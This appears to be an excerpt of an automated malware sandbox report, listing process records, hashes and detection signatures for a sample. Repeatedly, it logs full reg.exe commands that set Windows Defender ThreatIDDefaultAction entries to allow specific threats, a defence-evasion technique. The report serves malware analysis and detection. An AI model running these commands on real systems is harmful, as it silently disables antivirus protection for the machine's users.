F3BDBE3BB6F734E357235F4D5898582D
|
| Time: |
17:14:26
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x11d0000
|
| Modulesize: |
364544
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Very long cmdline option found, this is very uncommon (may be encrypted or packed) |
HIPS / PFW / Operating System Protection Evasion |
Command and Scripting Interpreter
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
5200
|
| Target ID: |
34
|
| Parent PID: |
4764
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
17:14:27
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x10e0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Too many similar processes found |
DDoS |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
225451 /t REG_SZ /d 6 /reg:64
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
5504
|
| Target ID: |
35
|
| Parent PID: |
5976
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
225451 /t REG_SZ /d 6 /reg:64
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
17:14:28
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x10e0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Too many similar processes found |
DDoS |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
256596 /t REG_SZ /d 6 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
3020
|
| Target ID: |
36
|
| Parent PID: |
5976
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
256596 /t REG_SZ /d 6 /reg:32
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
17:14:28
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x10e0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Too many similar processes found |
DDoS |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
256596 /t REG_SZ /d 6 /reg:64
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
5124
|
| Target ID: |
37
|
| Parent PID: |
5976
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
256596 /t REG_SZ /d 6 /reg:64
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
17:14:28
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x10e0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Too many similar processes found |
DDoS |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
242872 /t REG_SZ /d 6 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6032
|
| Target ID: |
38
|
| Parent PID: |
5976
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
242872 /t REG_SZ /d 6 /reg:32
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
17:14:29
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x10e0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Too many similar processes found |
DDoS |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
242872 /t REG_SZ /d 6 /reg:64
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
2332
|
| Target ID: |
39
|
| Parent PID: |
5976
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
242872 /t REG_SZ /d 6 /reg:64
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
17:14:29
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x10e0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Too many similar processes found |
DDoS |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
2147749373 /t REG_SZ /d 6 /reg:32
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
6140
|
| Target ID: |
40
|
| Parent PID: |
5976
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
2147749373 /t REG_SZ /d 6 /reg:32
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
17:14:30
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x10e0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Too many similar processes found |
DDoS |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
2147749373 /t REG_SZ /d 6 /reg:64
|
|
|
| Is windows: |
true
|
| Is dropped: |
false
|
| PID: |
4724
|
| Target ID: |
41
|
| Parent PID: |
5976
|
| Name: |
reg.exe
|
| Class: |
system-tools
|
| Path: |
C:\Windows\SysWOW64\reg.exe
|
| Commandline: |
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v
2147749373 /t REG_SZ /d 6 /reg:64
|
| Size: |
59392
|
| MD5: |
CEE2A7E57DF2A159A065A34913A055C2
|
| Time: |
17:14:30
|
| Date: |
03/10/2022
|
| Reason: |
newprocess
|
| Reputation: |
timeout
|
| Is admin: |
true
|
| Is elevated: |
true
|
| Modulebase: |
0x10e0000
|
| Modulesize: |
335872
|
| Wow64: |
true
|
| Signature Hits |
Behavior Group |
Mitre Attack |
|
| Uses cmd line tools excessively to alter registry or file data |
Persistence and Installation Behavior |
Command and Scripting Interpreter
|
| Creates a process in suspended mode (likely to inject code) |
HIPS / PFW / Operating System Protection Evasion |
|
| Too many similar processes found |
DDoS |
|
| Uses reg.exe to modify the Windows registry |
System Summary |
|
| Spawns processes |
System Summary |
|
|
|
C:\Windows\SysWOW64\reg.exe
|
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f |
